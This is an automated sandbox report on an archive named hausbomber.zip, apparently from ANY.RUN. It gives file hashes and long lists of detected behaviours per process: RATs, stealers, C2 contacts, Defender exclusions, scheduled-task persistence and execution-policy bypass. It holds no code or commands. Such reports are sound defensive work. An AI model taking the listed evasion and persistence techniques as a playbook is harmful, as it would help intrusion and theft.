File name:

hausbomber.zip

Full analysis: https://app.any.run/tasks/f864a3ef-6cbc-414d-b60f-7501258eadd0
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Analysis date: May 09, 2025, 23:44:10
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
loader
hausbomber
github
connectwise
rmm-tool
lumma
stealer
rat
njrat
bladabindi
telegram
ssh
screenconnect
remote
auto
redline
asyncrat
remcos
evasion
arch-scr
arch-html
generic
quasarrat
xor-url
cobaltstrike
azorult
poverty
povertystealer
lumar
exfiltration
discord
purelogs
purecrypter
nanocore
rdp
phishing
meterpreter
xworm
ftp
gcleaner
discordtoken
quasar
winring0x64-sys
vuln-driver
autoit
formbook
miner
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
MD5:

7B6F55A9EE447B26636018C734D99DFF

SHA1:

4CD828F2D3BF299AB907ED4042D171052B25E9BF

SHA256:

CD8A2526A63D0E8DFF0630F084C0C9F59D3CDEA363DF0F75BA8E2D28E5CD95E3

SSDEEP:

192:s7rTAuU2nS4O6rO33TYbK1Hoa79C6s1grY0pi73S:sj5nfO6r03TKQps2vi73S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 6372)
    • HAUSBOMBER has been detected (YARA)

      • 4363463463464363463463463.exe (PID: 4608)
    • Executing a file with an untrusted certificate

      • td.exe (PID: 5404)
      • Te.exe (PID: 872)
      • Software.exe (PID: 8844)
      • viewer.exe (PID: 8092)
      • viewer.exe (PID: 9032)
      • taskhost.exe (PID: 4428)
      • viewer.exe (PID: 4728)
      • viewer.exe (PID: 8744)
      • viewer.exe (PID: 9352)
      • viewer.exe (PID: 9864)
      • viewer.exe (PID: 9872)
      • viewer.exe (PID: 3124)
      • viewer.exe (PID: 9920)
      • new.exe (PID: 8428)
      • dpinst_amd64.exe (PID: 7512)
      • mixseven.exe (PID: 10688)
      • LatestLeave.exe (PID: 8700)
      • LukeJazz.exe (PID: 11528)
      • jy.exe (PID: 11300)
      • jokererer.exe (PID: 5868)
    • REDLINE has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
    • Changes the autorun value in the registry

      • services.exe (PID: 6800)
      • fusca%20game.exe (PID: 6272)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • fuck122112.exe (PID: 9148)
    • NjRAT is detected

      • fusca%20game.exe (PID: 6272)
    • Connects to the CnC server

      • svchost.exe (PID: 2196)
      • 4363463463464363463463463.exe (PID: 4608)
      • GoogleUpdate.exe (PID: 3100)
      • crypted.exe (PID: 9604)
      • taskmgr.exe (PID: 9260)
    • XORed URL has been found (YARA)

      • td.exe (PID: 5404)
    • NJRAT has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • njSilent.exe (PID: 5072)
      • svchost.exe (PID: 7596)
      • 4363463463464363463463463.exe (PID: 4608)
      • GoodFrag.exe (PID: 12192)
      • Runtime Broker.exe (PID: 13160)
    • LUMMA has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • 4363463463464363463463463.exe (PID: 4608)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 6640)
      • Client-built.exe (PID: 6004)
      • Application Frame Host.exe (PID: 7916)
      • cmd.exe (PID: 6904)
      • Win64.exe (PID: 9504)
      • Amogus.exe (PID: 9936)
      • Win64.exe (PID: 1628)
      • Win64.exe (PID: 9136)
      • cmd.exe (PID: 8532)
      • cmd.exe (PID: 9844)
      • cmd.exe (PID: 9448)
      • Win64.exe (PID: 10464)
      • Win64.exe (PID: 8980)
      • Win64.exe (PID: 8288)
      • Win64.exe (PID: 9236)
      • Win64.exe (PID: 11088)
      • Win64.exe (PID: 7972)
      • Win64.exe (PID: 1516)
      • Win64.exe (PID: 5232)
      • Win64.exe (PID: 4924)
      • Win64.exe (PID: 9800)
      • Win64.exe (PID: 8952)
      • Win64.exe (PID: 9744)
      • Win64.exe (PID: 9936)
      • Win64.exe (PID: 1120)
      • Win64.exe (PID: 7928)
      • Win64.exe (PID: 10700)
      • spectrum.exe (PID: 9656)
      • Java Updater.exe (PID: 1764)
      • AdobePDFReader.exe (PID: 9772)
      • AdobePDFReader.exe (PID: 7988)
      • Win64.exe (PID: 10088)
      • svhost.exe (PID: 10964)
      • svhost.exe (PID: 11644)
      • AdobePDFReader.exe (PID: 11448)
      • WenzCord.exe (PID: 12044)
      • Win64.exe (PID: 12100)
      • WenzCord.exe (PID: 11924)
      • AdobePDFReader.exe (PID: 12080)
      • WenzCord.exe (PID: 12152)
      • Win64.exe (PID: 11392)
      • bootstrapper.exe (PID: 12484)
      • Win64.exe (PID: 11408)
      • WenzCord.exe (PID: 12272)
      • AdobePDFReader.exe (PID: 10828)
      • AdobePDFReader.exe (PID: 11428)
      • WenzCord.exe (PID: 9288)
      • Win64.exe (PID: 10176)
      • WenzCord.exe (PID: 2564)
      • Win64.exe (PID: 1064)
      • AdobePDFReader.exe (PID: 1516)
    • ASYNCRAT has been found (auto)

      • ddosziller.exe (PID: 780)
      • 4363463463464363463463463.exe (PID: 4608)
    • GENERIC has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • 4363463463464363463463463.exe (PID: 4608)
      • 4363463463464363463463463.exe (PID: 4608)
      • mixseven.exe (PID: 10688)
      • 4363463463464363463463463.exe (PID: 4608)
    • NJRAT has been detected (YARA)

      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • fusca%20game.exe (PID: 6272)
    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 236)
      • ScreenConnect.ClientService.exe (PID: 4164)
    • XWORM has been detected (YARA)

      • services.exe (PID: 6800)
    • QUASARRAT has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • Client-built.exe (PID: 6004)
      • 4363463463464363463463463.exe (PID: 4608)
      • Amogus.exe (PID: 9936)
      • spectrum.exe (PID: 9656)
      • svhost.exe (PID: 10964)
      • WenzCord.exe (PID: 12044)
    • REMCOS has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • FXServer.exe (PID: 8008)
    • REMCOS has been detected (SURICATA)

      • GoogleUpdate.exe (PID: 3100)
    • STEALER has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • 4363463463464363463463463.exe (PID: 4608)
      • 4363463463464363463463463.exe (PID: 4608)
      • 4363463463464363463463463.exe (PID: 4608)
    • COBALTSTRIKE has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
    • REDLINE has been detected (YARA)

      • build.exe (PID: 4424)
    • Starts NET.EXE for service management

      • net.exe (PID: 9948)
      • cmd.exe (PID: 9472)
      • net.exe (PID: 7260)
      • net.exe (PID: 11688)
      • net.exe (PID: 8480)
      • cmd.exe (PID: 11820)
    • RDP has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
    • LUMAR has been detected (SURICATA)

      • MetaTrader.exe (PID: 8488)
    • NANOCORE has been found (auto)

      • jij.exe (PID: 9868)
      • 4363463463464363463463463.exe (PID: 4608)
    • PURELOGS has been found (auto)

      • crypted.exe (PID: 9604)
    • Stealers network behavior

      • MetaTrader.exe (PID: 8488)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8224)
      • powershell.exe (PID: 12464)
      • powershell.exe (PID: 9416)
      • powershell.exe (PID: 12648)
    • Changes powershell execution policy (Bypass)

      • crypted.exe (PID: 9604)
      • cmd.exe (PID: 3332)
      • cmd.exe (PID: 6512)
      • cmd.exe (PID: 12132)
    • RAT has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
      • ApiUpdater.exe (PID: 9760)
    • PURELOGS has been detected (SURICATA)

      • crypted.exe (PID: 9604)
    • Adds path to the Windows Defender exclusion list

      • nersready.exe (PID: 7768)
      • cmd.exe (PID: 8940)
      • f88253a.exe (PID: 10284)
      • cmd.exe (PID: 10688)
      • cvtres.exe (PID: 8196)
      • cmd.exe (PID: 10852)
      • cvtres.exe (PID: 9268)
      • cmd.exe (PID: 9568)
      • cmd.exe (PID: 5072)
      • cmd.exe (PID: 6264)
      • cmd.exe (PID: 2356)
      • cvtres.exe (PID: 7700)
      • cvtres.exe (PID: 11464)
      • cmd.exe (PID: 11836)
      • cmd.exe (PID: 11872)
      • cvtres.exe (PID: 12108)
      • cmd.exe (PID: 12260)
      • cmd.exe (PID: 10568)
      • cvtres.exe (PID: 11900)
      • cmd.exe (PID: 12200)
      • cmd.exe (PID: 9608)
      • cmd.exe (PID: 12236)
      • cmd.exe (PID: 10272)
      • cvtres.exe (PID: 4652)
      • cvtres.exe (PID: 8108)
      • cmd.exe (PID: 8092)
      • cmd.exe (PID: 11512)
      • cvtres.exe (PID: 12092)
      • cmd.exe (PID: 10084)
      • cmd.exe (PID: 10720)
    • Uses Task Scheduler to run other applications

      • PowerShell.exe (PID: 9424)
      • cmd.exe (PID: 11744)
    • METERPRETER has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2196)
    • QUASAR has been detected (YARA)

      • SubDir.exe (PID: 3016)
    • ASYNCRAT has been detected (YARA)

      • tesst.exe (PID: 7384)
    • Changes Windows Defender settings

      • f88253a.exe (PID: 10284)
    • QUASAR has been found (auto)

      • AdobePDFReader.exe (PID: 9772)
      • 4363463463464363463463463.exe (PID: 4608)
    • Vulnerable driver has been detected

      • we64.exe (PID: 3384)
    • FORMBOOK has been found (auto)

      • 4363463463464363463463463.exe (PID: 4608)
    • Antivirus name has been found in the command line (generic signature)

      • findstr.exe (PID: 5384)
    • Starts CMD.EXE for self-deleting

      • IMG001.exe (PID: 1748)
    • MINER has been detected (SURICATA)

      • taskmgr.exe (PID: 9260)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 12464)
      • powershell.exe (PID: 9416)
      • powershell.exe (PID: 12648)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 4363463463464363463463463.exe (PID: 4608)
      • td.exe (PID: 5404)
      • rundll32.exe (PID: 2064)
      • services.exe (PID: 6800)
      • 5142A417D128494B9A9D67961121E943.exe (PID: 4188)
      • rah.exe (PID: 4464)
      • ddosziller.exe (PID: 780)
      • njSilent.exe (PID: 5072)
      • svchost.exe (PID: 7596)
      • FXServer.exe (PID: 8008)
      • Client-built.exe (PID: 6004)
      • ExtremeInjector.exe (PID: 8200)
      • FreeYoutubeDownloader.exe (PID: 6512)
      • AA_v3.exe (PID: 5952)
      • Software.exe (PID: 8844)
      • Stub.exe (PID: 9828)
      • qrtb.exe (PID: 9764)
      • jf.exe (PID: 9804)
      • rundll32.exe (PID: 2564)
      • crypted.exe (PID: 9604)
      • jij.exe (PID: 9868)
      • svchogz.exe (PID: 5172)
      • ApiUpdater.exe (PID: 9760)
      • Amogus.exe (PID: 9936)
      • MetaTrader.exe (PID: 8488)
      • Stub.exe (PID: 6264)
      • IMG001.exe (PID: 2516)
      • PowerShell.exe (PID: 9424)
      • nvnc.exe (PID: 9584)
      • 1465810408079_502.exe (PID: 10276)
      • IMG001.exe (PID: 1748)
      • qcoin140.exe (PID: 8544)
      • QUpdate.exe (PID: 10760)
      • f88253a.exe (PID: 10284)
      • jd127.exe (PID: 1496)
      • mixseven.exe (PID: 10688)
      • spectrum.exe (PID: 9656)
      • AdobePDFReader.exe (PID: 9772)
      • svhost.exe (PID: 10964)
      • cryptography_module_windows.exe (PID: 9772)
      • jy.exe (PID: 11300)
      • jy.tmp (PID: 7508)
      • WenzCord.exe (PID: 12044)
      • we64.exe (PID: 3384)
      • Hl2dm_Updater.exe (PID: 10272)
      • Hl2dm_Updater.exe (PID: 10492)
      • Output.exe (PID: 12104)
      • Relay.com (PID: 9220)
      • rundll32.exe (PID: 12476)
      • bootstrapper.exe (PID: 12484)
      • GoodFrag.exe (PID: 12192)
      • cmd.exe (PID: 11820)
      • Runtime Broker.exe (PID: 13160)
    • Reads security settings of Internet Explorer

      • 4363463463464363463463463.exe (PID: 4608)
      • td.exe (PID: 5404)
      • installer_ver09.10.25.exe (PID: 2656)
      • alphaTweaks.exe (PID: 1452)
    • The process creates files with name similar to system file names

      • 4363463463464363463463463.exe (PID: 4608)
      • td.exe (PID: 5404)
    • Process requests binary or script from the Internet

      • 4363463463464363463463463.exe (PID: 4608)
      • td.exe (PID: 5404)
      • QUpdate.exe (PID: 10760)
      • jd127.exe (PID: 1496)
      • Hl2dm_Updater.exe (PID: 10492)
      • Hl2dm_Updater.exe (PID: 10272)
    • Connects to the server without a host name

      • 4363463463464363463463463.exe (PID: 4608)
    • Connects to unusual port

      • 4363463463464363463463463.exe (PID: 4608)
      • build.exe (PID: 4424)
      • services.exe (PID: 6800)
      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • svchost.exe (PID: 7596)
      • ScreenConnect.ClientService.exe (PID: 236)
      • 123.exe (PID: 8164)
      • SubDir.exe (PID: 3016)
      • Application Frame Host.exe (PID: 7916)
      • asdasdasdasdasd.exe (PID: 4180)
      • %E7%8B%99%E5%87%BB%E6%89%8B_%E5%B9%BD%E7%81%B5%E6%88%98%E5%A3%AB2%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%E7%89%88.exe (PID: 8668)
      • Discord.exe (PID: 8896)
      • taskhost.exe (PID: 4428)
      • svchogz.exe (PID: 5172)
      • jf.exe (PID: 9804)
      • yceoce.exe (PID: 9716)
      • MetaTrader.exe (PID: 8488)
      • e.exe (PID: 8212)
      • CPDB.exe (PID: 9760)
      • crypted.exe (PID: 9604)
      • 1223.exe (PID: 8416)
      • PowerShell.exe (PID: 9424)
      • ScreenConnect.ClientService.exe (PID: 4164)
      • evetbeta.exe (PID: 8316)
      • kms_activator.exe (PID: 9660)
      • Java Updater.exe (PID: 1764)
      • mstsc.exe (PID: 1532)
      • kali_tools.exe (PID: 10580)
      • svhost.exe (PID: 11644)
      • Fast%20Download.exe (PID: 7272)
      • taskmgr.exe (PID: 9260)
      • Runtime Broker.exe (PID: 13160)
    • Potential Corporate Privacy Violation

      • 4363463463464363463463463.exe (PID: 4608)
      • 123.exe (PID: 8164)
      • ScreenConnect.ClientService.exe (PID: 236)
      • AA_v3.exe (PID: 5952)
      • %E7%8B%99%E5%87%BB%E6%89%8B_%E5%B9%BD%E7%81%B5%E6%88%98%E5%A3%AB2%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%E7%89%88.exe (PID: 8668)
      • svchost.exe (PID: 2196)
      • ScreenConnect.ClientService.exe (PID: 4164)
      • msedge.exe (PID: 11184)
      • jd127.exe (PID: 1496)
      • QUpdate.exe (PID: 10760)
      • Hl2dm_Updater.exe (PID: 10492)
      • Hl2dm_Updater.exe (PID: 10272)
      • taskmgr.exe (PID: 9260)
    • Process drops legitimate windows executable

      • td.exe (PID: 5404)
      • 4363463463464363463463463.exe (PID: 4608)
      • services.exe (PID: 6800)
      • Software.exe (PID: 8844)
      • Stub.exe (PID: 9828)
      • MetaTrader.exe (PID: 8488)
      • nvnc.exe (PID: 9584)
      • 1465810408079_502.exe (PID: 10276)
      • f88253a.exe (PID: 10284)
      • cryptography_module_windows.exe (PID: 9772)
      • jy.tmp (PID: 7508)
      • we64.exe (PID: 3384)
      • Output.exe (PID: 12104)
      • cmd.exe (PID: 11820)
      • Relay.com (PID: 9220)
    • The process drops C-runtime libraries

      • td.exe (PID: 5404)
      • Stub.exe (PID: 9828)
      • nvnc.exe (PID: 9584)
      • cryptography_module_windows.exe (PID: 9772)
    • Starts a Microsoft application from unusual location

      • services.exe (PID: 6800)
      • crypted.2.exe (PID: 7216)
      • cron2.exe (PID: 8760)
      • jf.exe (PID: 9804)
      • dpinst_amd64.exe (PID: 7512)
      • f88253a.exe (PID: 10284)
      • f88253a.exe (PID: 3276)
      • f88253a.exe (PID: 1040)
      • f88253a.exe (PID: 8340)
      • f88253a.exe (PID: 8872)
      • f88253a.exe (PID: 5308)
      • f88253a.exe (PID: 7180)
      • f88253a.exe (PID: 6472)
      • f88253a.exe (PID: 10984)
      • f88253a.exe (PID: 10472)
      • ale12312.exe (PID: 6892)
      • f88253a.exe (PID: 11416)
      • f88253a.exe (PID: 12076)
      • f88253a.exe (PID: 6808)
      • f88253a.exe (PID: 7952)
      • f88253a.exe (PID: 11924)
      • f88253a.exe (PID: 5304)
      • f88253a.exe (PID: 10348)
      • RegAsm.exe (PID: 9440)
    • Executes as Windows Service

      • VSSVC.exe (PID: 3332)
      • ScreenConnect.ClientService.exe (PID: 236)
      • AA_v3.exe (PID: 5116)
      • yceoce.exe (PID: 9716)
      • ScreenConnect.ClientService.exe (PID: 4164)
      • VSSVC.exe (PID: 12744)
      • svchost.exe (PID: 11280)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • fusca%20game.exe (PID: 6272)
      • svchost.exe (PID: 7596)
      • cmd.exe (PID: 8428)
      • cmd.exe (PID: 9536)
      • cmd.exe (PID: 9636)
      • mos%20ssssttttt.exe (PID: 12568)
      • testme.exe (PID: 12896)
      • Runtime Broker.exe (PID: 13160)
    • There is functionality for taking screenshot (YARA)

      • td.exe (PID: 5404)
      • build.exe (PID: 4424)
      • SubDir.exe (PID: 3016)
    • Contacting a server suspected of hosting an CnC

      • svchost.exe (PID: 2196)
      • 4363463463464363463463463.exe (PID: 4608)
      • GoogleUpdate.exe (PID: 3100)
      • fuck122112.exe (PID: 9148)
    • The process executes Powershell scripts

      • sound.exe (PID: 5072)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4452)
    • Starts POWERSHELL.EXE for commands execution

      • sound.exe (PID: 5072)
      • 4363463463464363463463463.exe (PID: 4608)
      • crypted.exe (PID: 9604)
      • f88253a.exe (PID: 10284)
      • cmd.exe (PID: 3332)
      • cmd.exe (PID: 6512)
      • cmd.exe (PID: 12132)
    • Possibly malicious use of IEX has been detected

      • sound.exe (PID: 5072)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 6584)
      • MSBuild.exe (PID: 6244)
      • MSBuild.exe (PID: 7420)
      • installer.exe (PID: 8136)
      • MSBuild.exe (PID: 11600)
      • MSBuild.exe (PID: 6592)
    • Starts itself from another location

      • rah.exe (PID: 4464)
      • njSilent.exe (PID: 5072)
      • Client-built.exe (PID: 6004)
      • Amogus.exe (PID: 9936)
      • IMG001.exe (PID: 2516)
      • spectrum.exe (PID: 9656)
      • AdobePDFReader.exe (PID: 9772)
      • svhost.exe (PID: 10964)
      • WenzCord.exe (PID: 12044)
      • GoodFrag.exe (PID: 12192)
    • Executes application which crashes

      • Te.exe (PID: 872)
      • patch.exe (PID: 7428)
      • Cloudy.exe (PID: 7252)
      • crypted.exe (PID: 7772)
      • support.client.exe (PID: 7356)
      • RuntimeBroker.exe (PID: 10164)
      • boleto.exe (PID: 8356)
      • fuck122112.exe (PID: 11484)
      • XClient.exe (PID: 8480)
    • Starts CMD.EXE for commands execution

      • ddosziller.exe (PID: 780)
      • FXServer.exe (PID: 8008)
      • wscript.exe (PID: 7668)
      • GoogleUpdate.exe (PID: 3100)
      • viewer.exe (PID: 8092)
      • cmd.exe (PID: 8392)
      • viewer.exe (PID: 9032)
      • cmd.exe (PID: 132)
      • viewer.exe (PID: 4728)
      • viewer.exe (PID: 8744)
      • cmd.exe (PID: 9088)
      • viewer.exe (PID: 9352)
      • cmd.exe (PID: 9408)
      • viewer.exe (PID: 9864)
      • viewer.exe (PID: 9872)
      • viewer.exe (PID: 3124)
      • cmd.exe (PID: 9988)
      • cmd.exe (PID: 9268)
      • viewer.exe (PID: 9920)
      • jf.exe (PID: 9804)
      • Stub.exe (PID: 6264)
      • qrtb.exe (PID: 9764)
      • ApiUpdater.exe (PID: 9760)
      • crypted.exe (PID: 9604)
      • IMG001.exe (PID: 2516)
      • Win64.exe (PID: 9504)
      • nersready.exe (PID: 7768)
      • pornhub_downloader.exe (PID: 8004)
      • Win64.exe (PID: 1628)
      • IMG001.exe (PID: 1748)
      • pornhub_downloader.exe (PID: 7444)
      • cmd.exe (PID: 9844)
      • %E6%B8%85%E7%90%86%E5%9E%83%E5%9C%BE.exe (PID: 10408)
      • nvnc.exe (PID: 9932)
      • Win64.exe (PID: 9136)
      • Win64.exe (PID: 10464)
      • Win64.exe (PID: 8980)
      • Win64.exe (PID: 9236)
      • Win64.exe (PID: 8288)
      • Win64.exe (PID: 7972)
      • Win64.exe (PID: 11088)
      • Win64.exe (PID: 1516)
      • Win64.exe (PID: 5232)
      • Win64.exe (PID: 4924)
      • Win64.exe (PID: 9800)
      • Win64.exe (PID: 8952)
      • Win64.exe (PID: 1120)
      • Win64.exe (PID: 9744)
      • Win64.exe (PID: 9936)
      • Win64.exe (PID: 7928)
      • Win64.exe (PID: 10700)
      • ITplan.exe (PID: 10620)
      • LatestLeave.exe (PID: 8700)
      • cvtres.exe (PID: 8196)
      • AdobePDFReader.exe (PID: 7988)
      • cvtres.exe (PID: 9268)
      • cvtres.exe (PID: 7700)
      • Win64.exe (PID: 10088)
      • cvtres.exe (PID: 11464)
      • cvtres.exe (PID: 12108)
      • LukeJazz.exe (PID: 11528)
      • cmd.exe (PID: 8388)
      • WenzCord.exe (PID: 11924)
      • cvtres.exe (PID: 11900)
      • AdobePDFReader.exe (PID: 11448)
      • cvtres.exe (PID: 4652)
      • we64.exe (PID: 3384)
      • Win64.exe (PID: 12100)
      • wscript.exe (PID: 11512)
      • cvtres.exe (PID: 8108)
      • cvtres.exe (PID: 12092)
      • AdobePDFReader.exe (PID: 12080)
      • WenzCord.exe (PID: 12152)
      • Win64.exe (PID: 11392)
      • ScreenConnect.WindowsClient.exe (PID: 12140)
      • WenzCord.exe (PID: 12272)
      • Win64.exe (PID: 11408)
      • cmd.exe (PID: 13020)
      • AdobePDFReader.exe (PID: 10828)
      • AdobePDFReader.exe (PID: 11428)
      • ScreenConnect.WindowsClient.exe (PID: 768)
      • WenzCord.exe (PID: 9288)
      • Win64.exe (PID: 10176)
      • ScreenConnect.WindowsClient.exe (PID: 11412)
      • AdobePDFReader.exe (PID: 1516)
      • WenzCord.exe (PID: 2564)
      • ScreenConnect.WindowsClient.exe (PID: 12544)
      • Win64.exe (PID: 1064)
    • Executing commands from a ".bat" file

      • ddosziller.exe (PID: 780)
      • jf.exe (PID: 9804)
      • Win64.exe (PID: 9504)
      • Stub.exe (PID: 6264)
      • Win64.exe (PID: 1628)
      • pornhub_downloader.exe (PID: 8004)
      • pornhub_downloader.exe (PID: 7444)
      • %E6%B8%85%E7%90%86%E5%9E%83%E5%9C%BE.exe (PID: 10408)
      • Win64.exe (PID: 9136)
      • Win64.exe (PID: 10464)
      • Win64.exe (PID: 8980)
      • Win64.exe (PID: 9236)
      • Win64.exe (PID: 8288)
      • Win64.exe (PID: 11088)
      • Win64.exe (PID: 7972)
      • Win64.exe (PID: 1516)
      • Win64.exe (PID: 5232)
      • Win64.exe (PID: 4924)
      • Win64.exe (PID: 9800)
      • Win64.exe (PID: 8952)
      • Win64.exe (PID: 1120)
      • Win64.exe (PID: 9744)
      • Win64.exe (PID: 9936)
      • Win64.exe (PID: 7928)
      • ITplan.exe (PID: 10620)
      • Win64.exe (PID: 10700)
      • LatestLeave.exe (PID: 8700)
      • AdobePDFReader.exe (PID: 7988)
      • Win64.exe (PID: 10088)
      • WenzCord.exe (PID: 11924)
      • AdobePDFReader.exe (PID: 11448)
      • we64.exe (PID: 3384)
      • Win64.exe (PID: 12100)
      • wscript.exe (PID: 11512)
      • AdobePDFReader.exe (PID: 12080)
      • WenzCord.exe (PID: 12152)
      • Win64.exe (PID: 11392)
      • ScreenConnect.WindowsClient.exe (PID: 12140)
      • WenzCord.exe (PID: 12272)
      • AdobePDFReader.exe (PID: 10828)
      • Win64.exe (PID: 11408)
      • AdobePDFReader.exe (PID: 11428)
      • WenzCord.exe (PID: 9288)
      • ScreenConnect.WindowsClient.exe (PID: 768)
      • Win64.exe (PID: 10176)
      • ScreenConnect.WindowsClient.exe (PID: 11412)
      • WenzCord.exe (PID: 2564)
      • Win64.exe (PID: 1064)
      • AdobePDFReader.exe (PID: 1516)
      • ScreenConnect.WindowsClient.exe (PID: 12544)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1272)
      • cmd.exe (PID: 8392)
      • cmd.exe (PID: 132)
      • cmd.exe (PID: 9408)
      • cmd.exe (PID: 9088)
      • cmd.exe (PID: 9988)
      • cmd.exe (PID: 9268)
    • The executable file from the user directory is run by the CMD process

      • tesst.exe (PID: 7384)
      • Win64.exe (PID: 1628)
      • Win64.exe (PID: 9136)
      • Win64.exe (PID: 10464)
      • Win64.exe (PID: 9236)
      • Win64.exe (PID: 8980)
      • Win64.exe (PID: 8288)
      • Win64.exe (PID: 11088)
      • Win64.exe (PID: 7972)
      • Win64.exe (PID: 1516)
      • Win64.exe (PID: 8952)
      • Win64.exe (PID: 5232)
      • Win64.exe (PID: 4924)
      • Win64.exe (PID: 9800)
      • Win64.exe (PID: 1120)
      • Win64.exe (PID: 9744)
      • Win64.exe (PID: 9936)
      • Win64.exe (PID: 7928)
      • Win64.exe (PID: 10700)
      • Win64.exe (PID: 10088)
      • Win64.exe (PID: 12100)
      • WenzCord.exe (PID: 12152)
      • Relay.com (PID: 9220)
      • Win64.exe (PID: 11392)
      • Win64.exe (PID: 11408)
      • WenzCord.exe (PID: 12272)
      • WenzCord.exe (PID: 9288)
      • Win64.exe (PID: 10176)
      • Win64.exe (PID: 1064)
      • WenzCord.exe (PID: 2564)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 236)
      • ScreenConnect.ClientService.exe (PID: 4164)
    • Application launched itself

      • 123.exe (PID: 8052)
      • AA_v3.exe (PID: 5116)
      • cmd.exe (PID: 8392)
      • cmd.exe (PID: 132)
      • cmd.exe (PID: 9088)
      • cmd.exe (PID: 9408)
      • cmd.exe (PID: 9988)
      • cmd.exe (PID: 9268)
      • Stub.exe (PID: 9828)
      • crypted.exe (PID: 7772)
      • nvnc.exe (PID: 9584)
      • cmd.exe (PID: 9844)
      • installer_ver19.02.exe (PID: 10500)
      • f88253a.exe (PID: 10284)
      • cryptography_module_windows.exe (PID: 9772)
      • cmd.exe (PID: 8388)
      • fuck122112.exe (PID: 11484)
      • ScreenConnect.WindowsClient.exe (PID: 5544)
      • cmd.exe (PID: 13020)
    • Identifying current user with WHOAMI command

      • 123.exe (PID: 8164)
      • %E7%8B%99%E5%87%BB%E6%89%8B_%E5%B9%BD%E7%81%B5%E6%88%98%E5%A3%AB2%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%E7%89%88.exe (PID: 8668)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 8100)
      • cmd.exe (PID: 7368)
      • cmd.exe (PID: 5392)
      • cmd.exe (PID: 7896)
      • cmd.exe (PID: 9228)
      • cmd.exe (PID: 9492)
      • cmd.exe (PID: 10200)
      • cmd.exe (PID: 9544)
      • cmd.exe (PID: 3124)
      • cmd.exe (PID: 7780)
      • cmd.exe (PID: 8920)
      • cmd.exe (PID: 9844)
      • cmd.exe (PID: 4620)
      • cmd.exe (PID: 3332)
      • cmd.exe (PID: 6512)
      • cmd.exe (PID: 12132)
      • cmd.exe (PID: 2564)
    • Checks for external IP

      • AA_v3.exe (PID: 5952)
      • svchost.exe (PID: 2196)
      • Cloudy.exe (PID: 7252)
      • Stub.exe (PID: 6264)
      • crypted.exe (PID: 9604)
      • RuntimeBroker.exe (PID: 10164)
      • boleto.exe (PID: 8356)
      • XClient.exe (PID: 8480)
    • The process executes VB scripts

      • FXServer.exe (PID: 8008)
      • ApiUpdater.exe (PID: 9760)
      • we64.exe (PID: 3384)
    • Uses RUNDLL32.EXE to load library

      • AA_v3.exe (PID: 5952)
    • Executing commands from ".cmd" file

      • viewer.exe (PID: 8092)
      • viewer.exe (PID: 9032)
      • viewer.exe (PID: 4728)
      • viewer.exe (PID: 8744)
      • viewer.exe (PID: 9352)
      • viewer.exe (PID: 9872)
      • viewer.exe (PID: 3124)
      • viewer.exe (PID: 9864)
      • viewer.exe (PID: 9920)
      • LukeJazz.exe (PID: 11528)
    • Hides command output

      • cmd.exe (PID: 8368)
      • cmd.exe (PID: 8288)
      • cmd.exe (PID: 2908)
      • cmd.exe (PID: 9472)
      • cmd.exe (PID: 10180)
      • cmd.exe (PID: 9516)
      • cmd.exe (PID: 7752)
      • cmd.exe (PID: 13020)
    • Uses WMIC.EXE to obtain data on processes

      • cmd.exe (PID: 8392)
      • cmd.exe (PID: 8428)
      • cmd.exe (PID: 9088)
      • cmd.exe (PID: 9536)
      • cmd.exe (PID: 9988)
      • cmd.exe (PID: 9636)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 8392)
      • cmd.exe (PID: 8428)
      • cmd.exe (PID: 9088)
      • cmd.exe (PID: 9536)
      • cmd.exe (PID: 9988)
      • cmd.exe (PID: 9636)
      • cmd.exe (PID: 8388)
      • cmd.exe (PID: 11800)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 8392)
      • cmd.exe (PID: 9088)
      • cmd.exe (PID: 9988)
      • cmd.exe (PID: 9156)
      • cmd.exe (PID: 9924)
      • cmd.exe (PID: 11820)
      • cmd.exe (PID: 2564)
    • Process drops python dynamic module

      • Stub.exe (PID: 9828)
      • nvnc.exe (PID: 9584)
      • cryptography_module_windows.exe (PID: 9772)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 9472)
